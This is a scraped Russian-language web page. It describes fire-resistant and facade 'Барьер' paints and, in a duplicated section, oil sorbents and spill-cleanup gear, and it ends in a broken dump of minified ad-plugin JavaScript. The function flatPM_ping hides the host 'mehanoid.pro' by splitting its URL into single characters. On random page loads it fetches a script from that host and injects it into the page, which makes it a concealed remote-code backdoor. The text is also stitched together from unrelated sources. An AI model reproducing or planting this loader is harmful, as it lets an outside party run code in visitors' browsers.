Введенные в состав краски микросферы, рассеивая и преломляя тепловой поток, защищают окрашиваемые поверхности от перегрева, придают им свойства малого теплоусвоения, значительно увеличивают срок службы теплоизолирующего покрытия, выравнивают и сглаживают мелкие неровности окрашиваемой поверхности.

Краска универсальная огнестойкая «Барьер»

Краска предназначена для обработки строительных конструкций объектов промышленного и гражданского назначения, воздуховодов, цистерн, резервуаров, а также различного рода изделий и деталей машиностроения.

Огнестойкая краска, применяется в качестве огнезащитного покрытия деревянных кровель, стен, потолков и подвесных потолков вестибюлей, лестничных клеток, лифтовых холлов, для окрашивания деревянных, металлических, полимерных, бетонных, кирпичных поверхностей, тканей, стекла и иных материалов при внутренних и наружных работах в зданиях и сооружениях.

Краска фасадная «Барьер»

  • Краска фасадная, применяется для окрашивания дерева, металла, пластмасс, тканей, стекла, оштукатуренных, бетонных, кирпичных и других внутренних и внешних поверхностей зданий и сооружений.
  • После нанесения фасадная краска образует долговечную прочную матовую эластичную поверхность, устойчивую к истиранию, воздействию кислот, щелочей и УФ-лучей.

Пк вертикаль

654006, Кемеровская обл., г. Новокузнецк, а/я 142, ул. Л.Чайкиной д.17 корпус 1 Тел./факс (3843) 79-42-46 e-mail: pk.vertikal@list.ru

Источник: https://www.pk-vertikal.com/articles.html

Сорбенты

Сорбенты нефти и нефтепродуктов — эффективное средство для защиты окружающей среды от загрязнения нефтепродуктов в результате аварий и техногенных катастроф: разливы нефти, технических жидкостей, масла, бензина, керосина и других нефтепродуктов, химических загрязнителей. В общем виде, сорбентами являются твёрдые или жидкие тела, которые собирают (сорбируют) выборочно пары, газы, примеси вод. Важным является подбор вида сорбента, необходимого к применению на конкретном объекте, а также способа его утилизации (подробно см. раздел Выбираем сорбент ). Применение сорбентов нефтепродуктов позволяет снизить негативное влияние аварийных разливов на экологию, снизить уровень затрат на проведение работ по ЛАРН. Сорбенты широко используются для очистки водных и твердых поверхностей от нефти и нефтепродуктов разных видов.

В данной группе товаров представлены следующие виды сорбирующей продукции:

сорбенты

Порошкообразные и гранулированные сорбенты применяются в процессе проведения работ по ЛАРН для сорбции нефти и нефтепродуктов, очистки водных и твердых поверхностей от различных загрязнителей, некоторые — химически опасных веществ.

Сорбенты локализуют пятна нефти и иных загрязнителей, препятствуют их распространению. Преимуществом многих видов сорбентов является их природная основа, высокая скорость впитывания, поглощение паров, легкость транспортировки.

Ряд сорбентов имеют способность регенерации, что позволяет использовать их повторно. Некоторые сорбенты возможно применять для очистки воды.

Сорбенты активно используются в качестве наполнителя различных видов сорбирующих изделий. Нанесение и сбор сорбентов может производится двумя способами: ручным и механическим .

По своим техническим характеристикам сорбенты подразделяются на применяемые на твердой поверхности и смешанной  (твердой и водной одновременно).

сорбирующие изделия

Применяются в качестве технических средств для оперативной очистки водных и твердых поверхностей от загрязнителя и предоставляют возможность собрать нефтепродукты в самых труднодоступных местах (приямки, канализационные колодцы и прочие).

В связи с различиями объемов возможных разливов, а также объектов, где эти разливы могут произойти, предлагаются различные виды сорбирующих изделий: пластины , полотна , подушки , салфетки , маты , рулоны , которые имеют довольно широкие размерные ряды.

оборудование для работы с сорбентом и сорбирующими изделиями

Для удобства работы, ускорения процесса проведения работ по ЛАРН используется различное вспомогательное оборудование. Основная цель его использования — механизация ряда работ в процессе ликвидации аварийных разливов нефти, а также для продления срока эксплуатации изделий.

Сюда относятся устройства нанесения сорбента (распылители сорбента ), устройства продляющие срок эксплуатации сорбирующих материалов (отжимные механические устройства ), устройства, обеспечивающие удобство и компактность транспортировки сорбирующих материалов (контейнеры для хранения сорбента ) и другие.

С этим товаром приобретаютсяплавсредства утилизаторы резервуары и полога скиммеры боны 

Сорбенты нефти и нефтепродуктов — эффективное средство для защиты окружающей среды от загрязнения нефтепродуктов в результате аварий и техногенных катастроф: разливы нефти, технических жидкостей, масла, бензина, керосина и других нефтепродуктов, химических загрязнителей. В общем виде, сорбентами являются твёрдые или жидкие тела, которые собирают (сорбируют) выборочно пары, газы, примеси вод.

Важным является подбор вида сорбента, необходимого к применению на конкретном объекте, а также способа его утилизации (подробно см. раздел Выбираем сорбент[1] ).

  • Применение сорбентов нефтепродуктов позволяет снизить негативное влияние аварийных разливов на экологию, снизить уровень затрат на проведение работ по ЛАРН.
  • Сорбенты широко используются для очистки водных и твердых поверхностей от нефти и нефтепродуктов разных видов.
  • В данной группе товаров представлены следующие виды сорбирующей продукции:
  • — сорбенты[2] 

Порошкообразные и гранулированные сорбенты применяются в процессе проведения работ по ЛАРН для сорбции нефти и нефтепродуктов, очистки водных и твердых поверхностей от различных загрязнителей, некоторые — химически опасных веществ.

Сорбенты локализуют пятна нефти и иных загрязнителей, препятствуют их распространению.

Преимуществом многих видов сорбентов является их природная основа, высокая скорость впитывания, поглощение паров, легкость транспортировки. Ряд сорбентов имеют способность регенерации, что позволяет использовать их повторно. Некоторые сорбенты возможно применять для очистки воды.

Сорбенты активно используются в качестве наполнителя различных видов сорбирующих изделий. Нанесение и сбор сорбентов может производится двумя способами: ручным [3] и механическим[4] .

  1. По своим техническим характеристикам сорбенты подразделяются на применяемые на твердой поверхности[5]  и смешанной [6] (твердой и водной одновременно).
  2. — сорбирующие изделия[7] 
  3. Применяются в качестве технических средств для оперативной очистки водных и твердых поверхностей от загрязнителя ипредоставляют возможность собрать нефтепродукты в самых труднодоступных местах (приямки, канализационные колодцы и прочие).
  4. В связи с различиями объемов возможных разливов, а также объектов, где эти разливы могут произойти, предлагаются различные виды сорбирующих изделий: пластины[8] , полотна[9] , подушки[10] , салфетки[11] , маты[12] , рулоны[13] , которые имеют довольно широкие размерные ряды.
  5. оборудование для работы с сорбентом и сорбирующими изделиями[14] 

Для удобства работы, ускорения процесса проведения работ по ЛАРН используется различное вспомогательное оборудование. Основная цель его использования — механизация ряда работ в процессе ликвидации аварийных разливов нефти, а также для продления срока эксплуатации изделий.

  • Сюда относятся устройства нанесения сорбента (распылители сорбента[15] ), устройства продляющие срок эксплуатации сорбирующих материалов (отжимные механические устройства[16] ), устройства, обеспечивающие удобство и компактность транспортировки сорбирующих материалов (контейнеры для хранения сорбента[17] ) и другие.
  • С этим товаром приобретаются
  • плавсредства[18] 
  • утилизаторы[19] 
  • резервуары и полога[20] 
  • скиммеры[21] 
  • боны[22] 

Источник: http://ecolarn.ru/cart/sorbents.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};